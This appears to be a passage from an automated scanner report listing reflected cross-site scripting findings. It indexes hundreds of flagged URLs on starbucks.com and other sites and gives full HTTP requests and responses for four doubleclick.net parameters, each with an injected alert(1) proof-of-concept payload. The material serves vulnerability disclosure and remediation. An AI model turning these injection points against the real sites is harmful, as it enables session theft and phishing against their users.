1.788. http://www.starbucks.com/menu/drinks/tazo-tea/awake [name of an arbitrarily supplied request parameter]

1.789. http://www.starbucks.com/menu/drinks/tazo-tea/awake-tea-latte [name of an arbitrarily supplied request parameter]

1.790. http://www.starbucks.com/menu/drinks/tazo-tea/black-shaken-iced-tea [name of an arbitrarily supplied request parameter]

1.791. http://www.starbucks.com/menu/drinks/tazo-tea/calm [name of an arbitrarily supplied request parameter]

1.792. http://www.starbucks.com/menu/drinks/tazo-tea/chai-latte [name of an arbitrarily supplied request parameter]

1.793. http://www.starbucks.com/menu/drinks/tazo-tea/china-green-tips [name of an arbitrarily supplied request parameter]

1.794. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey [name of an arbitrarily supplied request parameter]

1.795. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey-tea-latte [name of an arbitrarily supplied request parameter]

1.796. http://www.starbucks.com/menu/drinks/tazo-tea/green-tea-latte [name of an arbitrarily supplied request parameter]

1.797. http://www.starbucks.com/menu/drinks/tazo-tea/iced-awake-tea-latte [name of an arbitrarily supplied request parameter]

1.798. http://www.starbucks.com/menu/drinks/tazo-tea/iced-chai-tea-latte [name of an arbitrarily supplied request parameter]

1.799. http://www.starbucks.com/menu/drinks/tazo-tea/iced-green-tea-latte [name of an arbitrarily supplied request parameter]

1.800. http://www.starbucks.com/menu/drinks/tazo-tea/orange-blossom [name of an arbitrarily supplied request parameter]

1.801. http://www.starbucks.com/menu/drinks/tazo-tea/passion [name of an arbitrarily supplied request parameter]

1.802. http://www.starbucks.com/menu/drinks/tazo-tea/refresh [name of an arbitrarily supplied request parameter]

1.803. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade [name of an arbitrarily supplied request parameter]

1.804. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea [name of an arbitrarily supplied request parameter]

1.805. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade [name of an arbitrarily supplied request parameter]

1.806. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea [name of an arbitrarily supplied request parameter]

1.807. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade [name of an arbitrarily supplied request parameter]

1.808. http://www.starbucks.com/menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea [name of an arbitrarily supplied request parameter]

1.809. http://www.starbucks.com/menu/drinks/tazo-tea/vanilla-roobios-tea-latte [name of an arbitrarily supplied request parameter]

1.810. http://www.starbucks.com/menu/drinks/tazo-tea/zen [name of an arbitrarily supplied request parameter]

1.811. http://www.starbucks.com/menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie [name of an arbitrarily supplied request parameter]

1.812. http://www.starbucks.com/menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie [name of an arbitrarily supplied request parameter]

1.813. http://www.starbucks.com/menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie [name of an arbitrarily supplied request parameter]

1.814. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]

1.815. http://www.starbucks.com/menu/food/bakery/8-grain-roll [name of an arbitrarily supplied request parameter]

1.816. http://www.starbucks.com/menu/food/bakery/apple-bran-muffin [name of an arbitrarily supplied request parameter]

1.817. http://www.starbucks.com/menu/food/bakery/apple-fritter [name of an arbitrarily supplied request parameter]

1.818. http://www.starbucks.com/menu/food/bakery/asiago-bagel [name of an arbitrarily supplied request parameter]

1.819. http://www.starbucks.com/menu/food/bakery/banana-nut-loaf [name of an arbitrarily supplied request parameter]

1.820. http://www.starbucks.com/menu/food/bakery/birthday-cake-mini-doughnut [name of an arbitrarily supplied request parameter]

1.821. http://www.starbucks.com/menu/food/bakery/blueberry-oat-bar [name of an arbitrarily supplied request parameter]

1.822. http://www.starbucks.com/menu/food/bakery/blueberry-scone [name of an arbitrarily supplied request parameter]

1.823. http://www.starbucks.com/menu/food/bakery/blueberry-streusel-muffin [name of an arbitrarily supplied request parameter]

1.824. http://www.starbucks.com/menu/food/bakery/butter-croissant [name of an arbitrarily supplied request parameter]

1.825. http://www.starbucks.com/menu/food/bakery/cheese-danish [name of an arbitrarily supplied request parameter]

1.826. http://www.starbucks.com/menu/food/bakery/chocolate-chunk-cookie [name of an arbitrarily supplied request parameter]

1.827. http://www.starbucks.com/menu/food/bakery/chocolate-croissant [name of an arbitrarily supplied request parameter]

1.828. http://www.starbucks.com/menu/food/bakery/chocolate-old-fashion-doughnut [name of an arbitrarily supplied request parameter]

1.829. http://www.starbucks.com/menu/food/bakery/chonga-bagel [name of an arbitrarily supplied request parameter]

1.830. http://www.starbucks.com/menu/food/bakery/cinnamon-chip-scone [name of an arbitrarily supplied request parameter]

1.831. http://www.starbucks.com/menu/food/bakery/cranberry-orange-scone [name of an arbitrarily supplied request parameter]

1.832. http://www.starbucks.com/menu/food/bakery/double-chocolate-brownie [name of an arbitrarily supplied request parameter]

1.833. http://www.starbucks.com/menu/food/bakery/double-fudge-mini-doughnut [name of an arbitrarily supplied request parameter]

1.834. http://www.starbucks.com/menu/food/bakery/double-iced-cinnamon-roll [name of an arbitrarily supplied request parameter]

1.835. http://www.starbucks.com/menu/food/bakery/ginger-molasses-cookie [name of an arbitrarily supplied request parameter]

1.836. http://www.starbucks.com/menu/food/bakery/hawaiian-bagel [name of an arbitrarily supplied request parameter]

1.837. http://www.starbucks.com/menu/food/bakery/iced-lemon-pound-cake [name of an arbitrarily supplied request parameter]

1.838. http://www.starbucks.com/menu/food/bakery/low-fat-raspberry-sunshine-muffin [name of an arbitrarily supplied request parameter]

1.839. http://www.starbucks.com/menu/food/bakery/mallorca-sweet-bread [name of an arbitrarily supplied request parameter]

1.840. http://www.starbucks.com/menu/food/bakery/maple-oat-pecan-scone [name of an arbitrarily supplied request parameter]

1.841. http://www.starbucks.com/menu/food/bakery/marble-pound-cake [name of an arbitrarily supplied request parameter]

1.842. http://www.starbucks.com/menu/food/bakery/marshmallow-dream-bar [name of an arbitrarily supplied request parameter]

1.843. http://www.starbucks.com/menu/food/bakery/morning-bun [name of an arbitrarily supplied request parameter]

1.844. http://www.starbucks.com/menu/food/bakery/multigrain-bagel [name of an arbitrarily supplied request parameter]

1.845. http://www.starbucks.com/menu/food/bakery/old-fashion-glazed-doughnut [name of an arbitrarily supplied request parameter]

1.846. http://www.starbucks.com/menu/food/bakery/outrageous-oatmeal-cookie [name of an arbitrarily supplied request parameter]

1.847. http://www.starbucks.com/menu/food/bakery/petite-vanilla-bean-scone [name of an arbitrarily supplied request parameter]

1.848. http://www.starbucks.com/menu/food/bakery/plain-bagel [name of an arbitrarily supplied request parameter]

1.849. http://www.starbucks.com/menu/food/bakery/pumpkin-bread [name of an arbitrarily supplied request parameter]

1.850. http://www.starbucks.com/menu/food/bakery/raspberry-scone [name of an arbitrarily supplied request parameter]

1.851. http://www.starbucks.com/menu/food/bakery/red-velvet-cupcake [name of an arbitrarily supplied request parameter]

1.852. http://www.starbucks.com/menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake [name of an arbitrarily supplied request parameter]

1.853. http://www.starbucks.com/menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake [name of an arbitrarily supplied request parameter]

1.854. http://www.starbucks.com/menu/food/bakery/reduced-fat-very-berry-coffeecake [name of an arbitrarily supplied request parameter]

1.855. http://www.starbucks.com/menu/food/bakery/starbucks-classic-coffee-cake [name of an arbitrarily supplied request parameter]

1.856. http://www.starbucks.com/menu/food/bakery/treat-sized-double-chocolate-cookie [name of an arbitrarily supplied request parameter]

1.857. http://www.starbucks.com/menu/food/bakery/treat-sized-peanut-butter-cookie [name of an arbitrarily supplied request parameter]

1.858. http://www.starbucks.com/menu/food/bakery/vanilla-bean-cupcake [name of an arbitrarily supplied request parameter]

1.859. http://www.starbucks.com/menu/food/bakery/zucchini-walnut-muffin [name of an arbitrarily supplied request parameter]

1.860. http://www.starbucks.com/menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate [name of an arbitrarily supplied request parameter]

1.861. http://www.starbucks.com/menu/food/fruit-and-snack-plates/fruit-and-cheese-plate [name of an arbitrarily supplied request parameter]

1.862. http://www.starbucks.com/menu/food/fruit-and-snack-plates/protein-plate [name of an arbitrarily supplied request parameter]

1.863. http://www.starbucks.com/menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll [name of an arbitrarily supplied request parameter]

1.864. http://www.starbucks.com/menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap [name of an arbitrarily supplied request parameter]

1.865. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-brown-sugar [name of an arbitrarily supplied request parameter]

1.866. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-dried-fruit [name of an arbitrarily supplied request parameter]

1.867. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-mixed-nuts [name of an arbitrarily supplied request parameter]

1.868. http://www.starbucks.com/menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin [name of an arbitrarily supplied request parameter]

1.869. http://www.starbucks.com/menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin [name of an arbitrarily supplied request parameter]

1.870. http://www.starbucks.com/menu/food/hot-breakfast/starbucks-perfect-oatmeal [name of an arbitrarily supplied request parameter]

1.871. http://www.starbucks.com/menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich [name of an arbitrarily supplied request parameter]

1.872. http://www.starbucks.com/menu/food/ice-cream/caramel-macchiato-ice-cream [name of an arbitrarily supplied request parameter]

1.873. http://www.starbucks.com/menu/food/ice-cream/coffee-ice-cream [name of an arbitrarily supplied request parameter]

1.874. http://www.starbucks.com/menu/food/ice-cream/java-chip-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

1.875. http://www.starbucks.com/menu/food/ice-cream/mocha-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

1.876. http://www.starbucks.com/menu/food/ice-cream/peppermint-mocha-ice-cream [name of an arbitrarily supplied request parameter]

1.877. http://www.starbucks.com/menu/food/ice-cream/signature-hot-chocolate-ice-cream [name of an arbitrarily supplied request parameter]

1.878. http://www.starbucks.com/menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

1.879. http://www.starbucks.com/menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

1.880. http://www.starbucks.com/menu/food/salads/farmers-market-salad [name of an arbitrarily supplied request parameter]

1.881. http://www.starbucks.com/menu/food/salads/fruit-cup [name of an arbitrarily supplied request parameter]

1.882. http://www.starbucks.com/menu/food/salads/garden-pesto-salad [name of an arbitrarily supplied request parameter]

1.883. http://www.starbucks.com/menu/food/salads/picnic-pasta-salad [name of an arbitrarily supplied request parameter]

1.884. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/chicken-santa-fe [name of an arbitrarily supplied request parameter]

1.885. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich [name of an arbitrarily supplied request parameter]

1.886. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella [name of an arbitrarily supplied request parameter]

1.887. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini [name of an arbitrarily supplied request parameter]

1.888. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich [name of an arbitrarily supplied request parameter]

1.889. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich [name of an arbitrarily supplied request parameter]

1.890. http://www.starbucks.com/menu/food/yogurt/dark-cherry-yogurt-parfait [name of an arbitrarily supplied request parameter]

1.891. http://www.starbucks.com/menu/food/yogurt/greek-yogurt-honey-parfait [name of an arbitrarily supplied request parameter]

1.892. http://www.starbucks.com/menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait [name of an arbitrarily supplied request parameter]

1.893. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]

1.894. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]

1.895. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]

1.896. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]

1.897. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]

1.898. http://www.starbucks.com/responsibility/community [name of an arbitrarily supplied request parameter]

1.899. http://www.starbucks.com/responsibility/community/community-service [name of an arbitrarily supplied request parameter]

1.900. http://www.starbucks.com/responsibility/community/ethos-water-fund [name of an arbitrarily supplied request parameter]

1.901. http://www.starbucks.com/responsibility/community/starbucks-foundation [name of an arbitrarily supplied request parameter]

1.902. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]

1.903. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]

1.904. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]

1.905. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]

1.906. http://www.starbucks.com/responsibility/diversity [name of an arbitrarily supplied request parameter]

1.907. http://www.starbucks.com/responsibility/diversity/suppliers [name of an arbitrarily supplied request parameter]

1.908. http://www.starbucks.com/responsibility/environment [name of an arbitrarily supplied request parameter]

1.909. http://www.starbucks.com/responsibility/environment/climate-change [name of an arbitrarily supplied request parameter]

1.910. http://www.starbucks.com/responsibility/environment/energy [name of an arbitrarily supplied request parameter]

1.911. http://www.starbucks.com/responsibility/environment/explore-green-store [name of an arbitrarily supplied request parameter]

1.912. http://www.starbucks.com/responsibility/environment/green-building [name of an arbitrarily supplied request parameter]

1.913. http://www.starbucks.com/responsibility/environment/recycling [name of an arbitrarily supplied request parameter]

1.914. http://www.starbucks.com/responsibility/environment/water [name of an arbitrarily supplied request parameter]

1.915. http://www.starbucks.com/responsibility/learn-more/goals-and-progress [name of an arbitrarily supplied request parameter]

1.916. http://www.starbucks.com/responsibility/learn-more/policies [name of an arbitrarily supplied request parameter]

1.917. http://www.starbucks.com/responsibility/learn-more/relationships [name of an arbitrarily supplied request parameter]

1.918. http://www.starbucks.com/responsibility/learn-more/shared-values-blog [name of an arbitrarily supplied request parameter]

1.919. http://www.starbucks.com/responsibility/learn-more/starbucks-shared-planet [name of an arbitrarily supplied request parameter]

1.920. http://www.starbucks.com/responsibility/sourcing [name of an arbitrarily supplied request parameter]

1.921. http://www.starbucks.com/responsibility/sourcing/cocoa [name of an arbitrarily supplied request parameter]

1.922. http://www.starbucks.com/responsibility/sourcing/coffee [name of an arbitrarily supplied request parameter]

1.923. http://www.starbucks.com/responsibility/sourcing/farmer-support [name of an arbitrarily supplied request parameter]

1.924. http://www.starbucks.com/responsibility/sourcing/store-products [name of an arbitrarily supplied request parameter]

1.925. http://www.starbucks.com/responsibility/sourcing/tea [name of an arbitrarily supplied request parameter]

1.926. http://www.starbucks.com/responsibility/wellness [name of an arbitrarily supplied request parameter]

1.927. http://www.starbucks.com/search [keywords parameter]

1.928. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]

1.929. http://www.starbucks.com/search/ [keywords parameter]

1.930. http://www.starbucks.com/search/ [name of an arbitrarily supplied request parameter]

1.931. http://www.starbucks.com/site-map [name of an arbitrarily supplied request parameter]

1.932. http://www.starbucks.com/smooth [name of an arbitrarily supplied request parameter]

1.933. http://www.starbucks.com/smooth/ [name of an arbitrarily supplied request parameter]

1.934. http://www.starbucks.com/store-locator [name of an arbitrarily supplied request parameter]

1.935. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]

1.936. https://www.starbucks.com/card/set-auto-reload [name of an arbitrarily supplied request parameter]

1.937. http://medienfreunde.com/ [Referer HTTP header]

1.938. http://remysharp.com/2007/01/25/jquery-tutorial-text-box-hints/ [Referer HTTP header]

1.939. https://secure.nypost.com/homedelivery/signup.htm [Referer HTTP header]

1.940. http://www.accuweather.com/index-radar.asp [Referer HTTP header]

1.941. http://www.accuweather.com/maps-satellite.asp [Referer HTTP header]

1.942. http://www.addthis.com/bookmark.php [Referer HTTP header]

1.943. http://www.addthis.com/bookmark.php [Referer HTTP header]

1.944. http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold [meld_sess cookie]

1.945. http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold [meld_sess cookie]



1. Cross-site scripting (reflected)
There are 945 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40 [_a parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4359.xplusone.com/B4953071.40

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5697"-alert(1)-"859af6071e4 was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064e5697"-alert(1)-"859af6071e4&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 08 Feb 2011 02:24:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7483

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064e5697"-alert(1)-"859af6071e4&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/ira100.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_OneHundred.swf-_-X_1_ML_Edge_Site_Retarge
...[SNIP]...

1.2. http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40 [_d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4359.xplusone.com/B4953071.40

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 116b5"-alert(1)-"ab2c8675d53 was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091116b5"-alert(1)-"ab2c8675d53&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 08 Feb 2011 02:25:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7563

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091116b5"-alert(1)-"ab2c8675d53&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_AdviceGuidance.swf-_-X_1_ML_Edge_Sit
...[SNIP]...

1.3. http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40 [_eo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4359.xplusone.com/B4953071.40

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e53b7"-alert(1)-"e8d8af3e077 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957e53b7"-alert(1)-"e8d8af3e077&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 08 Feb 2011 02:24:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7452

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957e53b7"-alert(1)-"e8d8af3e077&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/landing4.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_zero.swf-_-X
...[SNIP]...

1.4. http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40 [_et parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4359.xplusone.com/B4953071.40

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80c02"-alert(1)-"5944b1be99f was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=129713180380c02"-alert(1)-"5944b1be99f&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
